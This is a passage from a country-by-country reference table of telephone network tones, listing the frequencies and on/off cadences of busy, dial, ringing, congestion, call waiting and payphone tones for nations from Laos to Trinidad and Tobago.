Special dial tone - 425 0.40 on 0.04 off Line lock-out tone - 425 0.32 on 0.32 off Refusal tone - 425 0.1 on 0.4 off Ringing tone - 425 1.0 on 4.0 off Route tone - 425 0.1 on 0.1 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Warning tone - 425 0.34 on 5.0 off Call waiting tone - 425 1.0 on 4.0 off Lao People's Democratic Republic Busy tone - 425 1.0 on 1.0 off Confirmation tone - 950 continuous Congestion tone - 425 0.375 on 0.375 off Dial tone - 425 continuous Special dial tone - 425 0.4 on 0.04 off Number unobtainable tone - 425 2.5 on 0.5 off Ringing tone - 425 1.0 on 4.0 off Waiting tone - 425 0.4 on 0.4 off Latvia (Republic of) Busy tone - 425 0.3 on 0.3 off Congestion tone - 425 0.15 on 0.15 off Dial tone - 425 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.2 on 5.0 off Lebanon Busy tone - 435 0.4 on 0.2 off Ringing tone - 435 1.2 on 4.4 off Liberia (Republic of) Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Number unobtainable tone - 425 0.6 on 0.2 off 3x(0.2 on 0.2 off) Ringing tone - 425//450 1.0 on 4.0 off Lithuania (Republic of) Busy tone - 425 0.4 on 0.4 off Dial tone - 425 continuous Ringing tone - 425 0.8 on 3.2 off Waiting tone - 950/1400/1800 3x0.333 on 1.0 off Luxembourg Busy tone - 425//2125 0.48 on 0.48 off Congestion tone - 425//2125 0.24 on 0.24 off Dial tone - 425//2125 continuous Special dial tone - 400//425 continuous Ringing tone - 425//2125 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Test number tone - 1000 continuous Call waiting tone - 425 continuous Macau Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - 425 1.8 on 0.2 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 0.2 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Call waiting tone - 425 0.2 on 0.6 off Madagascar (Republic of) Busy tone - 440//425 0.5 on 0.5 off Congestion tone - announcement Dial tone - 440//425 continuous Special dial tone - 330+440 continuous Facilities tone - 950 continuous Pay tone - announcement Ringing tone - 440//425 1.7 on 3.3 off Route tone - 440//425 0.05 on 0.05 off Special information tone - 440 0.40 on 0.04 off Call waiting tone - 440 0.1 on 1.9 off Malaysia Busy tone - 425 0.5 on 0.5 off Congestion tone - I 425 0.50 on 0.25 off Congestion tone - II 425 0.5 on 0.5 off Dial tone - 425 continuous Ringing tone - I 425 0.4 on 0.2 off 0.4 on 2.0 off Ringing tone - II 425 1.0 on 3.0 off 1.0 on 5.0 off Malawi Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Intrusion tone - (4) 1400 0.35 on 0.5 off Payphone recognition tone - 1100+1750/750+1450 2x(0.2 on 0.2 off) Ringing tone - 425 1.0 on 4.0 off Special ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Maldives (Republic of) Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.25 on 0.25 off Dial tone -I 400/50 continuous Dial tone -II 400/50 1.0 on 1.0 off + continuous Number unobtainable tone - 400 continuous Ringing tone - 400 0.4 on 0.2 off 0.4 on 2.0 off Call waiting tone - 400 1.0 on 10.0 off Mali (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - announcement Dial tone - 425 continuous Pay tone - announcement Ringing tone - 425 1.5 on 3.0 off Route tone - 425 0.05 on 0.05 off Special information tone - 900/1400/1800 0.35 on 0.30 on 0.35 on 1.0 off Call waiting tone - 425 0.3 on 10.0 off Malta Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 0.2 on 0.2 off 0.6 on 1.0 off Special dial tone - 425 0.4 on 0.04 off Intercept tone - 950/1400/1800 3x0.24 on 1.0 off Ringing tone - 425 1.0 on 4.0 off Special information tone - announcement Call waiting tone - 1400 0.34 on 1.5 off Morocco (Kingdom of) Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Second dial tone - 660/440/590/740 0.5 on 0.5 off 0.5 on 0.3 on 0.2 on Ringing tone - 425 1.66 on 3.33 off Route tone - 425 0.05 on 0.05 off Martinique (French Department of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Mauritius (Republic of) Busy tone - 425 0.75 on 0.75 off Dial tone - 425 continuous Special dial tone - 425 0.4 on 0.04 off Ringing tone - 425 1.0 on 4.0 off Route tone - 425 0.05 on 0.05 off Call waiting tone - 425 1.0 on 3.0 off Mauritania (Islamic Republic of) Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Ringing tone - 425 1.5 on 3.5 off Route tone - 425 0.05 on 0.05 off Mayotte (Collectivit� territoriale de la R�publique fran�aise) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Mexico Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Ringing tone - 425 1.0 on 4.0 off Warning tone - operator intervening 425 0.5 on 0.17 off 0.17 on 0.17 off Moldova (Republic of) Busy tone - 425 0.35 on 0.35 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Pay tone - 1400 3x1.0 on 1.0 off Ringing tone - I 425 0.8 on 3.2 off Ringing tone - II 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Call waiting tone - 425 0.2 on 5.0 off Montserrat Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 0.25 on 0.25 off Payphone recognition tone - 1600/1143 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 450 0.2 on 0.2 off 0.65 on 0.2 off Waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) Mozambique (Republic of) Busy tone - 400 0.5 on O.5 off Number unobtainable tone - 400 0.2 on 0.2 off Ringing tone - 400 1.0 on 5.0 off Namibia (Republic of) Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.25 on 0.25 off Dial tone - 400x33 continuous Ringing tone - 400x33 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 400x33 continuous Nauru (Republic of) Busy tone - 400 0.5 on 0.5 off Busy tone - pabx 425 0.375 on 0.375 off Congestion tone - pabx 425 0.375 on 0.375 off Dial tone - 400 continuous Dial tone - pabx 33 continuous Recall dial tone - pabx 33 continuous Number unobtainable tone - 400 0.75 on 0.25 off 0.25 on 0.25 off Ringing tone - 400 1.0 on 4.0 off Ringing tone - pabx 425x25 0.4 on 0.2 off 0.4 on 2.0 off Nepal Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.175 on 0.175 off Dial tone - 425 continuous Number unobtainable tone - 425 0.25 on 0.5 off Ringing tone - 425 1.1 on 3.1 off Niger (Republic of the) Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Second dial tone - 330//440 continuous Ringing tone - 440 1.7 on 3.3 off Route tone - 440 0.05 on 0.05 off Nigeria (Federal Republic of) Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.25 on 0.25 off Dial tone - 400//450 continuous Recall dial tone - 400//425 continuous Special dial tone - 425 0.5 on 0.5 off Holding tone - 950/950/1400 0.65 on 0.325 off 0.325 on 1.3 on 2.6 off Number unobtainable tone - 450 0.5 on 0.5 off Ringing tone - 400//450 2.0 on 4.0 off Special information tone - 400//33 0.2 on 1.5 off Warning tone - operator intervening 400 0.15 on 0.25 off 0.15 on 1.45 off Call waiting tone - 400 0.2 on 0.2 off Norway Busy tone - 425 0.5 on 0.5 off Confirmation tone - 425 0.4 on Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Special dial tone - 470 0.4 on Intrusion tone - 1400 1x(2.0 on) Pay tone - I 1477+941 0.2 on 2.0 off 0.2 on 2.0 off Pay tone - II 1633+1336 0.2 on 0.2 off 0.2 on 4.0 off Payphone recognition tone - 1477/941 4x(0.2 on 0.2 off 0.2 on 2.0 off) Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 425 1x(1.0 on 0~4.0 off) Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - I 1400 0.4 on 15.0 off Warning tone - II 1400 1x(0.4 on 0~15.0 off) Call waiting tone - 425 0.2 on 0.6 off 0.2 on 1.0 off New Caledonia (Territoire fran�ais d'outre-mer) Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 1.7 on 3.3 off + announcement Dial tone - 440//330+440 continuous Ringing tone - 440 1.7 on 3.3 off Special information tone - 440 1.7 on 3.3 off + announcement Call waiting tone - 440 4x(0.5 on 0.5 off 0.5 on) New Zealand Busy tone - 400 0.5 on 0.5 off Congestion tone - I 900 0.5 on 0.5 off Congestion tone - II 400 0.25 on 0.25 off Dial tone - (3) 400 continuous Function acknowledge tone - 440+450 2.0 on 0.4 off 0.2 on 0.4 off Holding tone - 400/400+450 0.5 on 0.5 off 0.5 on 0.25 off Number unobtainable tone - 400 3x(0.75 on 0.1 off) 0.75 on 0.4 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 400+450 0.4 on 0.2 off 0.4 on 2.0 off Waiting tone - I 400+450 0.5 on Waiting tone - II 400 0.25 on 0.25 off 0.25 on 3.25 off Waiting tone - III 523/659 3x(0.2 on 3.0 off) 0.2 on Oman (Sultanate of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Intrusion tone - 425 0.5 on 0.17 off 0.17 on 0.17 off Ringing tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.3 on 1.0 off Uganda (Republic of) Busy tone - 425 0.5 on 5.0 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - 350/440 continuous Howler tone - 1400 continuous Number unobtainable tone - 950/1400/1800 3x0.33 on 1.00 off Offering tone, trunk - 425 0.1 on 4.9 off Ringing tone - 425 1.0 on 4.0 off Route tone - 425 0.05 on 0.05 off Call waiting tone - 425 continuous Pakistan (Islamic Republic of) Busy tone - I 400 0.75 on 0.75 off Busy tone - II 450 0.4 on 0.675 off 0.13 on 0.17 off Ringing tone - I 450 1.0 on 4.0 off Ringing tone - II 400+16 2/3 0.4 on 0.2 off 0.4 on 2.0 off Panama (Republic of) Busy tone - 425 0.32 on 0.32 off Congestion tone - 425 0.32 on 0.32 off Dial tone - 425 continuous Number unobtainable tone - 425 0.18 on 0.18 off 0.5 on 0.18 off Ringing tone - 425 1.2 on 4.65 off Special information tone - 425 0.4 on 0.4 off Warning tone - operator intervening 425 0.18 on 0.18 off 0.5 on 0.18 off Call waiting tone - 425 0.18 on 0.18 off 0.18 on Papua New Guinea Busy tone - 425//400 0.375 on 0.375 off Congestion tone - 425//400 0.375 on 0.375 off Dial tone - 425//400x25//350+440 continuous Special dial tone - 425 0.4 on 0.04 off Number unobtainable tone - 425//400 2.5 on 0.5 off Payphone recognition tone - I 1209/852 4x(0.2 on 0.2 off 0.2 on 2.0 off) Payphone recognition tone - II 1336/941 2x(0.2 on 0.2 off 0.2 on 2.0 off) Payphone recognition tone - III 900 2x(0.075 on 0.15 off 0.075 on 2.7 off) Ringing tone - 425//400x25//400x16 0.4 on 0.2 off 0.4 on 2.0 off 2/3//400+450//410x20 Special information tone - 950/1400/1800 3x0.33 on 1.01 off Warning tone - operator intervening 1400 0.5 on 11.5 off Waiting tone - 425 0.04 on 10.0 off 0.04 on 20.0 off 0.04 on 20.0 off Paraguay (Republic of) Busy tone - 425 1.0 on 1.0 off Number unobtainable tone - 425 2.0 on 0.5 off Positive indication tone - 950/1400/1800 3x0.333 on 1.0 off Ringing tone - 425 1.0 on 4.0 off Warning tone - operator intervening 425 0.15 on 0.25 off 0.15 on 1.45 off Waiting tone - 950/950/1400 0.65 on 0.325 off 0.125 on 1.3 off 2.6 on Netherlands (Kingdom of the) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - 425 0.5 on 0.05 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Waiting tone - 425 0.5 on 9.5 off Peru Acceptance tone - announcement Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off 0.2 on 0.2 off 0.2 on 0.6 off Dial tone - 425 continuous Special dial tone - 425 1.0 on 0.1 off Howler tone - 1500+3200 0.5 on Number unobtainable tone - announcement Refusal tone - announcement Ringing tone - 425 0.15 on 0.30 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.175 on 0.175 off 0.175 on 3.5 off Philippines (Republic of the) Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Conference tone - 440 0.2 on 15.0 off Dial tone - 425 continuous Special dial tone - 400+25 continuous Holding tone - 950/950/1400 0.65 on 0.325 off 0.325 on 1.3 on 2.0 off Howler tone - 1400+1800 0.2 on 0.3 off Number unobtainable tone - 600x120 0.25 on 0.25 off Ringing tone - 425+480 1.0 on 4.0 off Call waiting tone - 440 0.3 on 10.0 off Poland (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Second dial tone - 425+350 continuous Ringing tone - 425 1.0 on 4.0 off Route tone - 425 0.05 on 0.05 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Waiting tone - 425 0.15 on 0.15 off 0.15 on 4.0 off French Polynesia (Territoire fran�ais d'outre-mer) Acceptance tone - 440 1.7 on 3.3 off Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Second dial tone - 440+330 continuous Howler tone - 3000 continuous Pay tone - 440 continuous Ringing tone - 440 1.7 on 3.3 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 440 1.7 on 3.3 off Portugal Acceptance tone - 425 1.0 on 0.2 off Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Special dial tone - 425 1.0 on 0.2 off Number unobtainable tone - 425 0.2 on 0.2 off Pay tone - I 250 0.5 on Pay tone - II 770 0.5 on Pay tone - III 985 1.0 on 1.0 off Pay tone - IV 941 0.2 on 0.2 off Pay tone - V 697 1.0 on Payphone recognition tone - I 1477/941 0.2 on 0.2 off 0.2 on 2.0 off Payphone recognition tone - II 1633/1209 0.2 on 0.2 off 0.2 on 2.0 off Payphone recognition tone - III 25+50 1.0 on 4.0 off Refusal tone - 450/1400/1800 3x0.33 on 1.0 off Ringing tone - 425 1.0 on 5.0 off Special ringing tone - 425 2x(1.0 on 5.0 off) Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 425 3x(0.2 on 1.4 off) Call waiting tone - 425 0.2 on 0.2 off 0.2 on 5.0 off Puerto Rico Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Qatar (State of) Acceptance tone - 400+450 0.38 on 0.25 off 0.38 on 2.00 off Busy tone - I 400+450 0.8 on 0.8 off Busy tone - II 400 0.375 on 0.375 off Busy tone - III 400 0.5 on 0.5 off Congestion tone - 400 0.40 on 0.35 off 0.22 on 0.52 off Dial tone - 350+440 continuous Line lock-out tone - 400 0.32 on 0.32 off Number unobtainable tone - 400 continuous Refusal tone - 400 continuous Ringing tone - I 400+450 0.38 on 0.25 off 0.38 on 2.0 off Ringing tone - II 400+450 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - 330+440 1.0 on 1.0 off Call waiting tone - 400 0.3 on 10.0 off Syrian Arab Republic Busy tone - 450 0.5 on 0.5 off Congestion tone - 450 0.25 on 0.25 off Dial tone - 450 continuous Ringing tone - 400//450 1.0 on 0.5 off Special information tone - 950/1400/1800 (3x0.33 on 2x0.03 off) 1.0 off Call waiting tone - 450 0.1 on 0.2 off 0.1 on 9.5 off Kyrgyz Republic Busy tone - 425 0.4 on 0.4 off Congestion tone - 425 0.4 on 0.4 off Number unobtainable tone - 425 0.4 on 0.4 off Ringing tone - 425 0.8 on 3.2 off Slovak Republic Busy tone - 425 0.33 on 0.33 off Congestion tone - 425 0.165 on 0.165 off Conference tone - 425 0.66 on Dial tone - I 425 0.33 on 0.33 off 0.66 on 0.66 off Dial tone - II (pabx) 425 continuous Special dial tone - 425 3x(0.165 on 0.165 off) 0.660 on 0.660 off Offering tone, trunk - 425 0.33 on 0.33 off 0.33 on 1.50 off Pay tone - I (cards) 622 0.125 on 0.125 off Pay tone - II (coins) 941 0.2 on 0.2 off 0.2 on 3.6 off Ringing tone - 425 1.0 on 4.0 off Special information tone -950/1400/1800 (3x0.33 on 2x0.03 off) 1.00 on Call waiting tone - 425 0.33 on 9.0 off Caller waiting tone - 425 1.00 on 0.17 off 0.33 on 3.50 off Czech Republic Busy tone - 425 0.33 on 0.33 off Connection tone - 1400 0.05 on 0.05 off Congestion tone - 425 0.165 on 0.165 off Dial tone - 425 0.33 on 0.33 off 0.66 on 0.66 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800(3x0.33 on 2x0.03 off) 1.0 off Call waiting tone - 425 0.33 on 9.0 off Caller waiting tone - 425 1.00 on 0.17 off 0.33 on 3.50 off Reunion (French Department of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Romania Busy tone - 133//450 0.15 on 0.20 off Dial tone - 400//450 continuous Number unobtainable tone - 400//450 6x(0.033 on 0.03 off) 0.1 on 0.03 off Ringing tone - 400x16//450x25 2.0 on 4.0 off United Kingdom of Great Britain and Northern Ireland Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.4 on 0.35 off 0.225 on 0.525 off Dial tone - 50//350+440 continuous Number unobtainable tone - 400 continuous Pay tone - 400 0.125 on 0.125 off Payphone recognition tone - 1200/800 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 400+450//400x25//400x1 0.4 on 0.2 off 0.4 on 2.0 off 6 2/3 Russian Federation Busy tone - 425 0.4 on 0.4 off Ringing tone - 425 0.8 on 3.2 off Waiting tone - 950/1400/1800 3x0.333 on 1.0 off Rwandese Republic Busy tone - 440 0.5 on 0.5 off Congestion tone - announcement Dial tone - 440 continuous Second dial tone - 340 continuous Pay tone - 12000 0.125 on Ringing tone - 440 1.7 on 3.3 off Route tone - 440 0.05 on 0.05 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Saint Kitts and Nevis Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 0.25 on 0.25 off Payphone recognition tone - 1600/1143 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone -operator intervening 450 0.2 on 0.2 off 0.65 on 0.2 off Waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) San Marino (Republic of) Busy tone - 425 0.2 on 0.2 off Dial tone - 425 0.6 on 1.0 off 0.2 on 0.2 off Ringing tone - 425 1.0 on 4.0 off Saint Pierre and Miquelon (Collectivit� territoriale de la R�publique fran�aise) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Saint Vincent and the Grenadines Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.40 on 0.35 off 0.225 on 0.525 off Dial tone - I 350+450 continuous Dial tone - II 350+450 0.75 on 0.75 off Pay tone - 400 0.125 on 0.125 off Ringing tone - 400+450 0.4 on 0.2 off Special information tone - 950/1400/1800 3x(0.33 on 1.0 off) Call waiting tone - 400 0.1 on 5.0 off Saint Helena Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.4 on 0.35 off Dial tone - 350+400 continuous Number unobtainable tone - 400 continuous Pay tone - 400 0.125 on 0.125 off Ringing tone - 400+450 0.4 on 0.2 off Saint Lucia Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - 425+330 continuous Pay tone - 622 0.136 on 0.136 off Ringing tone - 425 0.375 on 0.25 off 0.375 on 2.0 off Route tone - 425 0.05 on 0.05 off Warning tone - 425 0.1 on 4.9 off Call waiting tone - 425 0.2 on 0.2 off 0.2 on 4.0 off Solomon Islands Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.1 on 0.1 off Dial tone - 400 continuous Number unobtainable tone - 400 0.075 on 0.1 off Pay tone - 852 0.2 on 2.0 off Ringing tone - 400+450 0.4 on 0.2 off Waiting tone - 400+450/400 0.5 on 0.5 off Western Samoa (Independent State of) Congestion tone - announcement Dial tone - 425 continuous Number unobtainable tone - announcement Ringing tone - 425x25 0.375 on 0.25 off 0.375 on 2.0 off Sao Tome and Principe (Democratic Republic of) Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Pay tone - 12000 continuous Ringing tone - 425 1.0 on 5.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.2 on 1.0 off Senegal (Republic of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Ringing tone - 400 1.7 on 3.3 off Special information tone - 900/1380/1860 0.35 on 0.30 on 0.35 on Seychelles (Republic of) Busy tone - 425 0.375 on 0.375 off Congestion tone - 425 0.4 on 0.2 off 0.225 on 0.525 off Dial tone - 440+350 continuous Special dial tone - 425 1.0 on 0.1 off Facilities tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Howler tone - 3000 continuous Number unobtainable tone - 425 continuous Ringing tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Route tone - 425 0.5 on 0.5 off Special information tone - 900/1400/1800 3x0.33 on 1.0 off Test number tone - 800//1900 continuous Call waiting tone - 425 3x(0.3 on 9.7 off) Sierra Leone Busy tone - 425//450 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425//450 continuous Number unobtainable tone - 950//450/150 0.33 on 0.03 off Ringing tone - 425//450 1.0 on 4.0 off Waiting tone - 425 1x(1.0 on) Singapore (Republic of) Busy tone - 425 0.75 on 0.75 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Ringing tone - 425x24 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Call waiting tone - 425 0.3 on 0.2 off 0.3 on 3.2 off Slovenia (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 0.2 on 0.3 off 0.7 on 0.8 off Special dial tone - 425 continuous Offering tone, trunk - 425 0.2 on 0.3 off 0.7 on 0.8 off Pay tone - 425 0.5 on 15.0 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Call waiting tone - 425 0.3 on 10.0 off Sri Lanka (Democratic Socialist Republic of) Busy tone - 425 0.75 on 0.75 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Holding tone - 425 0.5 on 2.5 off Intrusion tone - 425 0.5 on 0.75 off Number unobtainable tone - 425+330 continuous Ringing tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Route tone - 425 0.05 on 0.05 off Special information tone - 950/1400/1800 (3x0.33 on 2x 0.03 off) Warning tone - 425 0.5 on 4.5 off Call waiting tone - 425 0.5 on 2.5 off South Africa (Republic of) Busy tone - 400 0.5 on 0.5 off Comfort tone - 950/950/1400 0.65 on 0.325 off 0.325 on 1.3 on 2.6off Congestion tone - 400 0.25 on 0.25 off Dial tone - 400x33 continuous Special dial tone - 400x33 0.25 on 0.25 off + continuous Function acknowledge tone - 700/1100 0.25 on 0.25 off 0.25 on 0.25 off Intrusion tone - 400 0.15 on 0.25 off 0.15 on 1.45 off Notify tone - 900 0.2 on 0.2 off 0.2 on 0.2 off Number unobtainable tone - 400 2.5 on 0.5 off Ringing tone - 400x33 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 400x33 0.4 on 4.0 off Sweden Busy tone - I 425 0.25 on 0.25 off Busy tone - II (1) 425 0.5 on 0.5 off Congestion tone - I 425 0.25 on 0.75 off Congestion tone - II (1) 425 0.2 on 0.2 off Dial tone - 425 continuous Second dial tone - 425 continuous Special dial tone - 425 0.32 on 0.02 off Pay tone - 941 2x(0.2 on 0.2 off 0.2 on 3.6 off) Payphone recognition tone - 1477/941 11x(0.2 on 0.2 off 0.2 on 2.0 off) Ringing tone - I 425 1.0 on 5.0 off Ringing tone - II (1) 425 1.0 on 4.0 off Ringing tone - III (5)(9) 400 1.0 on 9.0 off Special information tone - I 950/1400/1800 3x0.33 on 1.0 off + announcement Special information tone - II (5)(9) 400 3x(0.05 on 0.2 off) 0.6 on 0.2 off Warning tone - operator intervening 1400 0.1 on 1.5 off Warning tone - three party conference 1400 0.35 on 15.0 off Warning tone - time limit barring 425 2.0 on 5.0 off + continuous Call waiting tone - I 425 1x(0.2 on 0.5 off 0.2 on) Call waiting tone - II (1) 425 0.2 on 0.6 off 0.2 on 3.0 off 0.2 on 0.6 off 0.2 on Switzerland (Confederation of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Special dial tone - 425+340 1.1 on 1.1 off Intrusion tone - 1400 0.2 on 2.0 off Pay tone - 1200 1.0 on Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Warning tone - 1400 0.45 on 15.0 off Call waiting tone - 425 0.2 on 0.2 off 0.2 on 4.0 off Suriname (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Ringing tone - 425 4.0 on 1.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Swaziland (Kingdom of) Busy tone - I 400 0.5 on 0.5 off Busy tone - II 400 0.4 on 0.4 off Dial tone - 50 continuous Number unobtainable tone - 400 4.8 on 0.2 off Pay tone - 900 0.25 on 0.25 off Payphone recognition tone - I 1430/943 2.0 on 2.0 off Payphone recognition tone - II 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 400 0.4 on 0.2 off 0.4 on 4.0 off Tajikistan (Republic of) Busy tone - 425 0.4 on 0.4 off Congestion tone - 425 0.4 on 0.4 off Dial tone - 425 continuous Pay tone - 1400 1.0 on 1.0 off Ringing tone - 425 0.8 on 3.2 off Special information tone - 425 continuous Call waiting tone - 950/1400/1800 0.8 on 3.2 off Taiwan, China Busy tone - 480+620 0.5 on 0.5 off Dial tone - 350+440 continuous Special dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Ringing tone - 440+480 1.0 on 2.0 off Re-order tone - 480+620 0.25 on 0.25 off Warning tone - 392/494/587 2x(0.5 on 0.5 on 1.5 on) Call waiting tone - I 440+480 1.5 on Call waiting tone - II 350+440 0.25 on 0.25 off 0.25 on 5.25 off Tanzania (United Republic of) Acceptance tone - 425 continuous Busy tone - I 425 1.0 on 1.0 off Busy tone - II 400 0.5 on 0.5 off Congestion tone - I 425 0.375 on 0.375 off Congestion tone - II 400 0.25 on 0.25 off Dial tone - 425//400 continuous Intrusion tone - 425 0.05 on 0.20 off Pay tone - 1100+1750//750+1450 0.2 on 0.2 off Refusal tone - 425 1.0 on 1.0 off Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 400 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - I 950/1400/1800 0.375 on 0.03 off 0.375 on 0.03 off 0.375 on Special information tone - II 950/1400/1800 3x0.33 on 1.0 off Test number tone - 2010 continuous Call waiting tone - I 425 0.05 on 0.20 off Call waiting tone - II 400 0.4 on 0.2 off Chad (Republic of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Second dial tone - 330+400 continuous Ringing tone - 440 1.7 on 3.3 off Special information tone - 950/1400/1800 (3x0.33 on 2x0.03 off) 1.0 off Thailand Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.3 on 0.3 off Dial tone - 400x50 continuous Ringing tone - 400 1.0 on 4.0 off Special information tone - announcement Call waiting tone - 400 1.0 on 10.0 off 1.0 on Trinidad and Tobago Busy tone - 480+620 0.5 on 0.5 off Dial tone - 350+440 continuous Ringing tone - 440+480 2.0 on 4.0 off Re-order tone - I 